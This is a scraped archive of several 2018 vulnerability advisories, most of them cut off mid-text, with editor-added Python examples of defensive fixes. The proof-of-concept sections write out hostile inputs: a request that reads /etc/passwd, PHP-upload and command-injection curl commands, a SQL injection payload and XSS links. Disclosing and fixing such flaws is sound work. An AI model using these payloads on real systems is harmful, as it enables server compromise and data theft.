sensitive.

Additionally, other shortcodes implemented and used by this plugin can be
abused through the same attack. Worse, some of them could lead to remote code
execution.


2. Local File Inclusion
The vulnerability is due to the lack of validation of the args/input passed to
render_html before they are handed to extract(), a PHP built-in function. Because
of this, the supplied args/input can be used to overwrite the $pagepath
variable, which then could lead to a local file inclusion attack.


Proof of concept:
-
1. Arbitrary Shortcode Execution
The parameter "shortcode" within the "admin-ajax.php" script is affected by
the code execution vulnerability:

POST /wp-admin/admin-ajax.php HTTP/1.1
[...]

action=woof_redraw_woof=<>


2. Local File Inclusion
The parameter "shortcode" within the "admin-ajax.php" script is affected by
the local file inclusion vulnerability:

POST /wp-admin/admin-ajax.php HTTP/1.1
[...]

action=woof_redraw_woof=woof_search_options pagepath=/etc/passwd


Vulnerable / tested versions:
-
PluginUs.Net WooCommerce Products Filter version 1.1.9 has been tested and
found to be vulnerable.


Vendor contact timeline:

2018-02-20: Contacting vendor through realmag...@gmail.com
2018-02-20: Vendor agreed to proceed without encrypted channel
2018-02-21: Sent security advisory to vendor
2018-02-26: Vendor sent patch containing the fixes
2018-02-26: Informed vendor the patch doesn't fully mitigate the vulnerability
2018-03-12: Request update from vendor
2018-03-12: Vendor said they already published the patch
2018-03-14: Public release of security advisory


Solution:
-
The vendor provides an updated version and users are urged to upgrade to version
2.2.0 immediately:

https://www.woocommerce-filter.com/update-woocommerce-products-filter-v-2-2-0/


Workaround:
---
None


Advisory URL:
-
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html


~~~~~~~~~~~


SEC Consult SA-20180312-0 :: Multiple Critical Vulnerabilities in SecurEnvoy SecurMail

2018-03-13 Thread SEC Consult Vulnerability Lab
SEC Consult Vulnerability Lab Security Advisory < 20180312-0 >
===
  title: Multiple Critical Vulnerabilities
product: SecurEnvoy SecurMail
 vulnerable version: 9.1.501
  fixed version: 9.2.501 or hotfix patch "1_012018"
 CVE number: CVE-2018-7701, CVE-2018-7702, CVE-2018-7703, CVE-2018-7704,
 CVE-2018-7705, CVE-2018-7706, CVE-2018-7707
 impact: Critical
   homepage: https://www.securenvoy.com/
  found: 2017-11
 by: W. Ettlinger (Office Vienna)
         SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Europe | Asia | North America

 https://www.sec-consult.com

===

Vendor description:
---
"Sending and receiving encrypted emails is not an easy or simple experience.
Businesses rely on email with an increasing amount of sensitive data sent across
their networks. A revolutionary approach that doesn't suffer from the overheads
of deployment and encryption management; just rock-solid security to give you
100% confidence in your business communications."

URL: https://www.securenvoy.com/products/securmail/key-features.shtm


Business recommendation:

During a brief crash test of the SecurEnvoy SecurMail application several severe
vulnerabilities have been identified that break the core security promises of
the product.

These vulnerabilities open the possibility for several different attack
scenarios that allow an attacker to read other users' encrypted e-mails and
overwrite or delete e-mails stored in other users' inboxes.

As we have identified several critical vulnerabilities within a very short time
frame we expect numerous other vulnerabilities to be present.

As other SecurEnvoy products (besides the analyzed SecurMail) appear
to be highly integrated (all products are installed with a single setup
file) we suspect other components to also suffer from severe security deficits.

We recommend not to use SecurEnvoy products (especially SecurMail) in a
production environment until:
* a comprehensive security audit has been performed and
* state of the art security mechanisms have been adopted.


Vulnerability overview/description:
---
1) Cross Site Scripting (CVE-2018-7703, CVE-2018-7707)
SEC Consult did not find any functionality that encodes user input when creating
HTML pages. Therefore persistent and reflected cross site scripting attacks are
possible throughout the application.

Some pages fail to properly decode URL encoded parameters. Because of this, cross
site scripting cannot be exploited on these pages in most browsers.


2) Path Traversal (CVE-2018-7705, CVE-2018-7706)
SEC Consult did not find any path traversal checks throughout the application.
Since the application uses encrypted files as the primary method of data
storage, this vulnerability can be exploited at several points.

Using this vulnerability, a legitimate recipient can read mails sent to other
recipients in plain text!


3) Insecure Direct Object Reference (CVE-2018-7704)
Authorization checks are only partially implemented. This allows a legitimate
recipient to read mails sent to other users in plain text.


4) Missing Authentication and Authorization (CVE-2018-7702)
In order to send encrypted e-mails a client does not need to authenticate on the
SecurEnvoy server. Therefore anyone with network access to the server can
arbitrarily send e-mails that appear to come from an arbitrary sender address.

Moreover, an attacker with network access to the server can re-send previous
communication to arbitrary recipients. This allows him/her to extract all
e-mails stored on the server. An attacker could also modify arbitrary messages
stored on the server.


5) Cross Site Request Forgery (CVE-2018-7701)
SEC Consult did not find any protection against cross site request forgery. An
attacker could use this vulnerability to delete a victim's e-mail or to
impersonate the victim and reply to his/her e-mails.


Since these vulnerabilities were found during a very short time frame, SEC
Consult believes that the product may contain a large number of other security
vulnerabilities. As already several core security promises have been broken
during this short crash test, no further tests were conducted.


Proof of concept:
-
1) Cross Site Scripting
a) The following HTML fragment demonstrates reflected cross site scripting
   (CVE-2018-7703):

--- snip ---

  
  

--- snip ---

b) E-mails that are sent using the HTML format can contain any 

SEC Consult SA-20180228-0 :: Insecure Direct Object Reference vulnerability in TestLink Open Source Test Management

2018-02-28 Thread SEC Consult Vulnerability Lab
SEC Consult Vulnerability Lab Security Advisory < 20180228-0 >
===
  title: Insecure Direct Object Reference
product: TestLink Open Source Test Management
 vulnerable version: <1.9.17
  fixed version: 1.9.17 (after November 2017), and the current
 "testlink_1_9" branch
 CVE number: -
 impact: Medium
   homepage: http://testlink.org/
  found: 2017-09-22
 by: T. Weber (Office Vienna)
             SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Bangkok - Berlin - Linz - Luxembourg - Montreal
 Moscow - Munich - Kuala Lumpur - Singapore
 Vienna (HQ) - Vilnius - Zurich

 https://www.sec-consult.com

===

Vendor description:
---
"TestLink is a web based test management and test execution system.
It enables quality assurance teams to create and manage their test
cases as well as to organize them into test plans. These test plans
allow team members to execute test cases and track test results
dynamically."

Source: https://github.com/TestLinkOpenSourceTRMS/testlink-code


Business recommendation:

SEC Consult advises to immediately install the available updates as attackers
might gain access to sensitive data belonging to other users.

A thorough security review performed by security professionals is highly
recommended in order to identify potential further security deficiencies.


Vulnerability overview/description:
---
1) Insecure Direct Object Reference
An unauthenticated user can gain access to referenced files which are produced
by different test cases. By using a simple ID iterator, all produced output
data can be gathered from the whole system.

The actual impact strongly depends on the classification of the produced data
which is referenced. Therefore, the risk can vary from low to critical
depending on the use case.


Proof of concept:
-
1) Insecure Direct Object Reference
An unauthenticated attacker can download data from the TestLink environment
by using the following url:
http:///lib/attachments/attachmentdownload.php?skipCheck=1=

The tag  specifies the target address and can also include a sub-
folder where the hosted TestLink application is located.


Vulnerable / tested versions:
-
The following versions have been tested and are vulnerable. It is assumed that
older versions are affected as well, e.g.:
* 1.9.16
* 1.9.15
* 1.9.14


Vendor contact timeline:

2017-10-18: Contacting vendor through http://mantis.testlink.org
Vendor requested the information.
2017-10-19: Asked if the advisory should be uploaded to mantis directly.
2017-10-21: Contact agreed.
2017-10-23: Uploaded the advisory to mantis.
2017-11-01: Contact provided a fix for 1.9.16. Fixes will be created for
1.9.15 and 1.9.14 too. Vendor asked us for verification.
2017-11-07: Stated that verification is not possible at the moment (no test
instance) and that it can be verified easily with the PoC.
2018-01-09: Asked for status update; No answer.
2018-01-29: Asked for status update; No answer.
2018-02-16: Asked for status update.
2018-02-17: Vendor responded that we can re-check the fix or release the
advisory.
2018-02-19: Asked the vendor for reachable test-instance, reply: there is
no test instance
2018-02-28: Public release of security advisory


Solution:
-
Check-out the current testlink-code on branch "testlink_1_9":
https://github.com/TestLinkOpenSourceTRMS/testlink-code/tree/testlink_1_9/

The following commit contains the fix since 2017-11-01:
https://github.com/TestLinkOpenSourceTRMS/testlink-code/commit/d5ffdb7634e43ba352e9567333682b6436cfb43d

Upgrade to 1.9.17 (after November 2017).


Workaround:
---
Restrict network access and do not expose the TestLink interface to the
internet.


Advisory URL:
-
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html


~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal
Moscow - Munich - Kuala Lumpur - Singapore
Vienna (HQ) - Vilnius - Zurich

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Henc

SEC Consult SA-20180227-0 :: OS command injection, arbitrary file upload & SQL injection in ClipBucket

2018-02-27 Thread SEC Consult Vulnerability Lab
SEC Consult Vulnerability Lab Security Advisory < 20180227-0 >
===
  title: OS command injection, arbitrary file upload & SQL injection
product: ClipBucket
 vulnerable version: <4.0.0 - Release 4902
  fixed version: 4.0.0 - Release 4902
 CVE number: -
 impact: critical
   homepage: http://clipbucket.com/
  found: 2017-09-06
 by: Ahmad Ramadhan Amizudin (Office Kuala Lumpur)
 Wan Ikram (Office Kuala Lumpur)
 Fikri Fadzil (Office Kuala Lumpur)
 Jasveer Singh (Office Kuala Lumpur)
         SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Bangkok - Berlin - Linz - Luxembourg - Montreal
 Moscow - Munich - Kuala Lumpur - Singapore
 Vienna (HQ) - Vilnius - Zurich

 https://www.sec-consult.com

===

Vendor description:
---
"ClipBucket is a free and open source software which helps us to create a
complete video sharing website like YouTube, Dailymotion, Metacafe, Veoh, Hulu
in few minutes of setup. It was first created in 2007 by Arslan Hassan and his
team of developers. ClipBucket was developed as a YouTube clone but has been
upgraded with advanced features and enhancements. It uses FFMPEG for video
conversion and thumbs generation which is the most widely used application so,
users can stream it straight away using the Video JS and HTML 5 Players."

Source: https://clipbucket.com/about


Business recommendation:

By exploiting the vulnerabilities documented in this advisory, an attacker can
fully compromise the web server which has ClipBucket installed. Potentially
sensitive data might get exposed through this attack.

Users are advised to immediately install the patched version provided by the
vendor.


Vulnerability overview/description:
---
1. Unauthenticated OS Command Injection
Any OS commands can be injected by an unauthenticated attacker. This is a
serious vulnerability as the chances for the system to be fully compromised are
very high. This same vulnerability can also be exploited by authenticated
attackers with normal user privileges.

2. Unauthenticated Arbitrary File Upload
A malicious file can be uploaded into the webserver by an unauthenticated
attacker. It is possible for an attacker to upload a script to issue operating
system commands. This same vulnerability can also be exploited by an
authenticated attacker with normal user privileges.

3. Unauthenticated Blind SQL Injection
The identified SQL injection vulnerabilities enable an attacker to execute
arbitrary SQL commands on the underlying MySQL server.


Proof of concept:
-
1. Unauthenticated OS Command Injection
Without having to authenticate, an attacker can exploit this vulnerability
by manipulating the "file_name" parameter during the file upload in the script
/api/file_uploader.php:

 $ curl -F "Filedata=@pfile.jpg" -F "file_name=aa.php ||<>"
http://$HOST/api/file_uploader.php


Alternatively, this vulnerability can also be exploited by authenticated basic
privileged users with the following payload by exploiting the same issue in
/actions/file_downloader.php:

$ curl --cookie "[--SNIP--]" --data "file=http://localhost/vid.mp4_name=abc
|| <>" "http://$HOST/actions/file_downloader.php"
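The root cause behind both requests above is that a user-supplied file name is
interpolated into a shell command line, so a value such as "aa.php || id"
terminates the intended command and appends an attacker-chosen one. The
following Python example is added by the editor and is not code from ClipBucket
or from the advisory. It sets the anti-pattern (a command built as text) beside
an allow-listed name and an argv-style invocation that never goes through a
shell. The ffmpeg arguments are illustrative assumptions; the only program the
example actually executes is the Python interpreter itself, echoing its argument
back so that the metacharacters can be seen arriving literally.

```python
import re
import subprocess
import sys

# Allow-list: conservative character set, no leading dot, no path separators.
# Spaces, "|", "&", ";", "$", quotes and "../" all fail this pattern.
SAFE_NAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]{0,127}$")


def validate_upload_name(name: str) -> bool:
    """True only for names that are safe to hand to another program."""
    return bool(SAFE_NAME.fullmatch(name)) and ".." not in name


def vulnerable_command(file_name: str) -> str:
    """The anti-pattern: the raw name lands inside a shell command string.
    Returned as text only; this function never executes anything."""
    return (f"ffmpeg -i /var/www/uploads/{file_name} "
            f"-vframes 1 /var/www/thumbs/{file_name}.jpg")


def safe_argv(file_name: str) -> list:
    """The fix: validate first, then build an argument vector (no shell).
    The ffmpeg flags are illustrative, not ClipBucket's real ones."""
    if not validate_upload_name(file_name):
        raise ValueError(f"rejected file name: {file_name!r}")
    return [
        "ffmpeg", "-i", f"/var/www/uploads/{file_name}",
        "-vframes", "1", f"/var/www/thumbs/{file_name}.jpg",
    ]


def echo_via_argv(value: str) -> str:
    """Show that shell metacharacters stay literal when passed as argv.
    The current Python interpreter stands in for the child process."""
    proc = subprocess.run(
        [sys.executable, "-c", "import sys; print(sys.argv[1])", value],
        capture_output=True, text=True, check=True,
    )
    return proc.stdout.rstrip("\n")


if __name__ == "__main__":
    payload = "aa.php || id"
    print("shell string :", vulnerable_command(payload))
    print("argv echo    :", echo_via_argv(payload))
    print("validated?   :", validate_upload_name(payload))
```

Run it directly to see the three lines: the shell string still carries the
injected "|| id", the argv echo returns the payload unchanged as a single
argument, and the validator rejects it before any command is built.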


2. Unauthenticated Arbitrary File Upload
Below is the cURL request to upload arbitrary files to the webserver with no
authentication required.

$ curl -F "file=@pfile.php" -F "plupload=1" -F "name=anyname.php"
"http://$HOST/actions/beats_uploader.php"

$ curl -F "file=@pfile.php" -F "plupload=1" -F "name=anyname.php"
"http://$HOST/actions/photo_uploader.php"

Furthermore, this vulnerability is also available to authenticated users with
basic privileges:

$ curl --cookie "[--SNIP--]" -F
"coverPhoto=@valid-image-with-appended-phpcode.php"
"http://$HOST/edit_account.php?mode=avatar_bg"


3. Unauthenticated Blind SQL Injection
The following parameters have been identified to be vulnerable against
unauthenticated blind SQL injection.

URL : http://$HOST/actions/vote_channel.php
METHOD  : POST
PAYLOAD : channelId=channelId=1-BENCHMARK(1, rand())

The source code excerpt below shows the vulnerable code
VULN. FILE : /actions/vote_channel.php
VULN. CODE :
[...]
$vote = $_POST["vote"];
$userid = $_POST["channelId"];
//if($userquery->login_check('',true)){
if($vote == "yes"){
$query = "UPDATE " . tbl("users") . " SET 
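The excerpt above reads channelId straight out of $_POST and concatenates it
into an UPDATE statement. The following Python example is added by the editor
and is not code from ClipBucket or from the advisory. It rebuilds that statement
against an in-memory SQLite table and places the concatenated form beside a
parameterised one and a typed one. SQLite has no BENCHMARK(), so the
demonstration uses a boolean payload rather than the time-based one from the
PoC; the table layout and seed rows are constructed for the example.

```python
import sqlite3

# Constructed sample data: three users, none voted for yet.
SEED_USERS = [(1, 0), (2, 0), (3, 0)]


def fresh_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (userid INTEGER PRIMARY KEY, votes INTEGER)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SEED_USERS)
    conn.commit()
    return conn


def votes_of(conn) -> list:
    return conn.execute("SELECT userid, votes FROM users ORDER BY userid").fetchall()


def vote_vulnerable(conn, channel_id: str) -> int:
    """Mirrors the PHP excerpt: the POST value is spliced into the SQL text.
    Returns the number of rows modified."""
    query = "UPDATE users SET votes = votes + 1 WHERE userid = " + channel_id
    cur = conn.execute(query)
    conn.commit()
    return cur.rowcount


def vote_safe(conn, channel_id) -> int:
    """Same statement with a bound parameter. The payload is compared as a
    single literal value, so '1 OR 1=1' matches no userid at all."""
    cur = conn.execute(
        "UPDATE users SET votes = votes + 1 WHERE userid = ?", (channel_id,)
    )
    conn.commit()
    return cur.rowcount


def vote_strict(conn, channel_id: str) -> int:
    """Defence in depth: enforce the expected type before the query runs."""
    try:
        cid = int(channel_id)
    except ValueError:
        raise ValueError("channelId must be an integer") from None
    return vote_safe(conn, cid)


if __name__ == "__main__":
    payload = "1 OR 1=1"
    db = fresh_db()
    print("vulnerable rows touched:", vote_vulnerable(db, payload), votes_of(db))
    db = fresh_db()
    print("bound rows touched     :", vote_safe(db, payload), votes_of(db))
```

With the concatenated query the payload turns a single-row vote into a
WHERE clause that is true for every row; with a bound parameter the same
string is compared as a value and touches nothing.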

SEC Consult SA-20180221-0 :: Hijacking of arbitrary miSafes Mi-Cam video baby monitors

2018-02-21 Thread SEC Consult Vulnerability Lab
We have published an accompanying blog post to this technical advisory with
further information:

https://www.sec-consult.com/en/blog/2018/02/internet-of-babies-when-baby-monitors-fail-to-be-smart/index.html


SEC Consult Vulnerability Lab Security Advisory < 20180221-0 >
===
  title: Hijacking of arbitrary video baby monitors
product: miSafes Mi-Cam remote video monitor
 vulnerable version: Android application v1.2.0, iOS v1.0.5
 Firmware v1.0.38
  fixed version: -
 CVE number: -
 impact: critical
   homepage: http://www.misafes.com/mi-cam
  found: 2017-11-30
 by: Mathias Frank (Office Vienna)
         SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Bangkok - Berlin - Linz - Luxembourg - Montreal
 Moscow - Munich - Kuala Lumpur - Singapore
 Vienna (HQ) - Vilnius - Zurich

 https://www.sec-consult.com

===

Vendor description:
---
"Mi-CamHD, Wi-Fi remote video monitor for everyone; 720P HD quality video, easy
set up & use, two-way talk and supports free local video recording, all can be
use by our user friendly Mi-Cam app."

Source: http://www.misafes.com/mi-cam


Business recommendation:

SEC Consult recommends not to use this device until a thorough security review
has been performed by security professionals and all identified issues have
been resolved! Although cloud-connected hardware may have an advantage regarding
usability and convenience for users, if security is lacking those products pose
a great risk for all customers.

Furthermore, it seems there exist similar products from other vendors, e.g.
"Qihoo 360 Smart Home Camera", that look exactly the same and may also be
affected but SEC Consult could not verify this. The cloud component hosted by
"qiwocloud2.com" may be used by other products as well. Additional information
regarding other vendors are described in our blog post linked at the top of this
advisory.


Vulnerability overview/description:
---
The usage of the Mi-Cam video baby monitor and its Android (or iOS) application,
involves numerous requests to a cloud infrastructure available at
ipcam.qiwocloud2.com with the aim of communicating with the video baby monitor
or respective Android application.

The Android application has at least 5-10 installations according to
Google Play Store with potentially as many iOS users as well.

SEC Consult has identified multiple critical security issues within this product.


1) Broken Session Management & Insecure Direct Object References
The usage of the Android application "Mi-Cam" and the interaction with the
video baby monitor involves several different API calls. A number of critical
API calls can be accessed by an attacker with arbitrary session tokens because
of broken session management.

This allows an attacker to retrieve information about the supplied account
and its connected video baby monitors. Information retrieved by this feature
is sufficient to view and interact with all connected video baby monitors for
the supplied UID.


2) Missing Password Change Verification Code Invalidation
The password forget functionality sends a 6-digit validation key which is valid
for 30 minutes to the supplied email address in order to set a new password.
Multiple codes can be requested though, while previously delivered codes do not
get invalidated and any one of them can be used as a valid key. This can easily
be brute-forced to take over other accounts.


3) Available Serial Interface
The PCB of the video baby monitor holds an unlabeled UART interface where an
attacker is able to get hardware level access to the device and for instance
extract the firmware for further analysis. SEC Consult identified further
security issues such as outdated software (issue 6) or weak passwords (issue 4)
by analyzing the firmware using IoT Inspector (https://www.iot-inspector.com).


4) Weak Default Credentials
The "root" user available on the video baby monitor uses very weak default
credentials with only 4 digits.


5) Enumeration of user accounts
The password reset functionality leaks information about the existence of
supplied user accounts which can aid in further (brute-force) attacks.
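Issues 2 and 5 above are two properties of one reset flow: every code issued in
the last 30 minutes stays valid, so each extra request widens the target an
attacker is guessing at, and the endpoint's answer reveals whether the address
exists. The following Python model is added by the editor and is not code from
the Mi-Cam app, its cloud backend or the advisory. It keeps the page's
parameters (six-digit code, 30-minute validity) and shows the weak store beside
one that keeps a single live code, counts wrong guesses against it and answers
reset requests uniformly. The attempt limit and the sample account are
assumptions.

```python
import secrets

CODE_SPACE = 10 ** 6      # six decimal digits
TTL_SECONDS = 30 * 60     # validity window named in the advisory
MAX_ATTEMPTS = 5          # assumption: wrong guesses tolerated per code


class ResetCodeStore:
    """Password-reset codes keyed by account.

    invalidate_previous=False reproduces the weakness: every unexpired code
    stays valid. invalidate_previous=True keeps exactly one live code per
    account and drops it after MAX_ATTEMPTS wrong guesses.
    """

    def __init__(self, invalidate_previous: bool):
        self.invalidate_previous = invalidate_previous
        self._codes = {}  # email -> list of [code, expires_at, wrong_attempts]

    def issue(self, email: str, now: float) -> str:
        code = f"{secrets.randbelow(CODE_SPACE):06d}"
        entry = [code, now + TTL_SECONDS, 0]
        if self.invalidate_previous:
            self._codes[email] = [entry]
        else:
            self._codes.setdefault(email, []).append(entry)
        return code

    def _live(self, email: str, now: float) -> list:
        live = [e for e in self._codes.get(email, []) if e[1] > now]
        self._codes[email] = live
        return live

    def valid_code_count(self, email: str, now: float) -> int:
        return len(self._live(email, now))

    def verify(self, email: str, guess: str, now: float) -> bool:
        live = self._live(email, now)
        for entry in live:
            if secrets.compare_digest(entry[0], guess):
                self._codes[email] = []       # single use
                return True
        if self.invalidate_previous:          # the hardened store rate-limits
            for entry in live:
                entry[2] += 1
            self._codes[email] = [e for e in live if e[2] < MAX_ATTEMPTS]
        return False

    def per_guess_success_probability(self, email: str, now: float) -> float:
        """Chance that one random six-digit guess matches any live code."""
        return self.valid_code_count(email, now) / CODE_SPACE


# Issue 5: the reset endpoint must answer identically for known and unknown
# addresses. Constructed sample account list.
KNOWN_ACCOUNTS = {"parent@example.com"}


def reset_response_leaky(email: str) -> str:
    if email in KNOWN_ACCOUNTS:
        return "A verification code has been sent."
    return "No account exists for this address."


def reset_response_uniform(email: str) -> str:
    # Sending the mail still happens only for real accounts; the response
    # text (and ideally its timing) does not reveal which branch ran.
    return "If this address is registered, a verification code has been sent."


if __name__ == "__main__":
    weak = ResetCodeStore(invalidate_previous=False)
    for _ in range(20):
        weak.issue("parent@example.com", 0.0)
    print("live codes after 20 requests:", weak.valid_code_count("parent@example.com", 1.0))
    print("per-guess odds:", weak.per_guess_success_probability("parent@example.com", 1.0))
```

Twenty requests against the weak store leave twenty live codes, so every
guess has 20 in a million odds instead of 1 in a million, and nothing stops
the guessing; the hardened store keeps the odds at one code and ends the
attempt after a handful of misses.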


6) Outdated and Vulnerable Software
Several software components which are affected by publicly known
vulnerabilities were identified in the firmware of the video baby monitor.


Proof of concept:
-
As the vendor could not be reached in order to get the issues fixed we will omit
detailed proof of concept information in this advisory.


1) Broke

SEC Consult SA-20180208-0 :: Multiple Cross-Site Scripting Vulnerabilities in Sonatype Nexus Repository Manager OSS/Pro

2018-02-09 Thread SEC Consult Vulnerability Lab
SEC Consult Vulnerability Lab Security Advisory < 20180208-0 >
===
  title: Multiple Cross-Site Scripting Vulnerabilities
product: Sonatype Nexus Repository Manager OSS/Pro
 vulnerable version: <=2.14.5, <=3.7.1
  fixed version: 2.14.6, 3.8.0
 CVE number: CVE-2018-5306, CVE-2018-5307
 impact: Medium
   homepage: https://www.sonatype.com/
  found: 2017-12-12
 by: Werner Schober, Daniel Ostovary (Office Vienna)
         SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
 Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

 https://www.sec-consult.com

===

Vendor description:
---
"At Sonatype we have a long history of partnership with the world of open
source software development. From our humble beginning as core contributors
to Apache Maven, to supporting the world’s largest repository of open source
components (Central), to distributing the world's most popular repository
manager (Nexus), we exist for one simple reason; to help accelerate software
innovation."

Source: https://www.sonatype.com/about-sonatype


Business recommendation:

The Sonatype Nexus Repository Server is affected by multiple XSS vulnerabilities
which could be used by an attacker to execute JavaScript code in the user's
browser.

The vendor provides a patch for both version 2 and 3 of the product which should
be installed immediately.

It is recommended to conduct a thorough security review by IT security
professionals in order to identify potential other security issues.


Vulnerability overview/description:
---
1) Reflected XSS vulnerability
The parameters "repoId" and "format" of the "healthCheckFileDetail" function
are vulnerable to reflected XSS. If the attacker can lure a user into
clicking a crafted link he could execute arbitrary JavaScript code.
In case the user has sufficient permissions, an attacker can create arbitrary
(administrative) users or perform stored XSS attacks (see 2).


2) Stored XSS vulnerabilities
The application is vulnerable to multiple stored XSS vulnerabilities,
which are described in the following list.

2.1) The first one is located in the "File Upload" functionality of
the "Staging Upload". Uploading a file with JavaScript code
in its name allows to store JavaScript code, which gets
triggered every time the file name is shown (e.g. in "Repositories").

2.2) The second stored XSS vulnerability is more precisely
being considered as stored DOM injection. This vulnerability
affects the functionality of creating a new user. When doing
so it is possible to inject JavaScript/HTML code in the username,
which later gets rendered/executed every time the username is
displayed.

2.3) The third stored XSS vulnerability is also a stored DOM injection.
It affects the "IQ Server Connection"/"IQ Server Dashboard"
functionality. The "IQ Server URL" field in the "IQ Server
Connection" allows to inject JavaScript/HTML code into the
menu bulletpoint "IQ Server Dashboard".


The vendor provided the following CVE numbers:
* CVE-2018-5306 - covers the XSS vulnerabilities in Nexus 3
* CVE-2018-5307 - covers the XSS vulnerabilities in Nexus 2


Proof of concept:
-
1) Reflected XSS vulnerability
By luring a user into clicking the following link, an arbitrary
JavaScript payload will be executed:

https://example.com/nexus/service/siesta/healthcheck/healthCheckFileDetail/.../index.html?repoId=public=sectest

Vulnerable parameters:
-) repoId
-) format

2) Stored XSS vulnerabilities
***Please note that only users with access to the respective functionalities
are susceptible to the following stored XSS vulnerabilities.***

2.1)
The staging upload allows an attacker to upload a file, which contains a
JavaScript payload in the filename. An example for a filename containing a
"malicious" payload is as follows: ".jpg"

This file can be uploaded flawlessly and every time the filename is displayed,
the JavaScript payload gets executed.

2.2)
An attacker is able to create a new user, which contains a malicious JavaScript
payload in the username. As an example the following username can be used:

"EvilAdmin Create Repository -> Access repository via "Repositories" ->
JavaScript code is being executed)

2.3)
The nexus server allows to setup an IQ server connection. The server name is not
validated and therefore allows the permanent injection of JavaScript code. To
demonstrate the vulnerability 

SEC Consult SA-20180207-0 :: Multiple buffer overflow vulnerabilities in InfoZip UnZip

2018-02-07 Thread SEC Consult Vulnerability Lab
SEC Consult Vulnerability Lab Security Advisory < 20180207-0 >
===
  title: Multiple buffer overflow vulnerabilities
product: InfoZip UnZip
 vulnerable version: UnZip <= 6.00 / UnZip <= 6.1c22
  fixed version: 6.10c23
 CVE number: CVE-2018-131,CVE-2018-132,CVE-2018-133
 CVE-2018-134,CVE-2018-135
 impact: high
   homepage: http://www.info-zip.org/UnZip.html
  found: 2017-11-03
 by: R. Freingruber (Office Vienna)
         SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
 Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

 https://www.sec-consult.com

===

Vendor description:
---
"UnZip is an extraction utility for archives compressed in .zip format (also
called "zipfiles"). Although highly compatible both with PKWARE's PKZIP and
PKUNZIP utilities for MS-DOS and with Info-ZIP's own Zip program, our
primary objectives have been portability and non-MSDOS functionality.
UnZip will list, test, or extract files from a .zip archive, commonly found
on MS-DOS systems. The default behavior (with no options) is to extract into
the current directory (and subdirectories below it) all files from the
specified zipfile."

Source: http://www.info-zip.org/UnZip.html

InfoZip's UnZip is used as default utility for uncompressing ZIP archives
on nearly all *nix systems. It gets shipped with many commercial products on
Windows to provide (un)compressing functionality as well.


Business recommendation:

InfoZip Unzip should be updated to the latest available version.


Vulnerability overview/description:
---
1) Heap-based buffer overflow in password protected ZIP archives (CVE-2018-135)

InfoZip's UnZip suffers from a heap-based buffer overflow when uncompressing
password protected ZIP archives. An attacker can exploit this vulnerability
to overwrite heap chunks to get arbitrary code execution on the target system.

For newer builds the risk of this vulnerability is partially mitigated
because modern compilers automatically replace unsafe functions with length
checking variants of the same function (for example sprintf gets replaced
by __sprintf_chk). This is done by the compiler at locations where the length
of the destination buffer can be calculated.

Nevertheless, it must be mentioned that UnZip is used on many systems
including older systems or on exotic architectures on which this protection
is not in place. Moreover, pre-compiled binaries which can be found on the
internet lack the protection because the last major release of InfoZip's
UnZip was in 2009 and compilers didn't enable this protection per default at
that time. The required compiler flags are also not set in the Makefile of
UnZip. Compiled applications are therefore only protected if the used compiler
has this protection enabled per default which is only the case with modern
compilers.

To trigger this vulnerability (and the following) it's enough to uncompress
a manipulated ZIP archive. Any of the following invocations can be used to
trigger and abuse the vulnerabilities:

>unzip malicious.zip
>unzip -p malicious.zip
>unzip -t malicious.zip

2) Heap-based out-of-bounds write (CVE-2018-131)

This vulnerability only affects UnZip 6.1c22 (next beta version of UnZip).
InfoZip's UnZip suffers from a heap-based out-of-bounds write if the
archive filename does not contain a .zip suffix.

3) Heap/BSS-based buffer overflow (Bypass of CVE-2015-1315) (CVE-2018-132)

This vulnerability only affects UnZip 6.1c22 (next beta version of UnZip).
InfoZip's UnZip suffers from a heap/BSS-based buffer-overflow which
can be used to write null-bytes out-of-bound when converting
attacker-controlled strings to the local charset.

4) Heap out-of-bounds access in ef_scan_for_stream (CVE-2018-133)

This vulnerability only affects UnZip 6.1c22 (next beta version of UnZip).
InfoZip's UnZip suffers from a heap out-of-bounds access
vulnerability.

5) Multiple vulnerabilities in the LZMA compression algorithm (CVE-2018-134)

This vulnerability only affects UnZip 6.1c22 (next beta version of UnZip).
InfoZip's UnZip suffers from multiple vulnerabilities in the LZMA
implementation. Various crash dumps have been supplied to the vendor
but no further analysis has been performed.


Proof of concept:
-
1) Heap-based buffer overflow in password protected ZIP archives (CVE-2018-135)

Unzipping a malicious archive results in the following output:
(On Ubuntu 16.04 with UnZip 6.0 which was installed via aptitude install unzip)

SEC Consult SA-20180201-0 :: Multiple critical vulnerabilities in Whole Vibratissimo Smart Sex Toy product range

2018-02-01 Thread SEC Consult Vulnerability Lab
We have published an accompanying blog post to this technical advisory with
further information:

https://www.sec-consult.com/en/blog/2018/02/internet-of-dildos-a-long-way-to-a-vibrant-future-from-iot-to-iod/index.html


SEC Consult Vulnerability Lab Security Advisory < 20180201-0 >
===
  title: Multiple critical vulnerabilities
product: Whole Vibratissimo Smart Sex Toy product range
 vulnerable version: <6.3 (iOS), <6.2.2 (Android), <2.0.2 (Firmware)
  fixed version: 6.3 (iOS), 6.2.2 (Android), 2.0.2 (Firmware)
 CVE number: -
 impact: critical
   homepage: http://www.vibratissimo.com
  found: 2017-10-01
 by: W. Schober (Office Vienna)
             SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
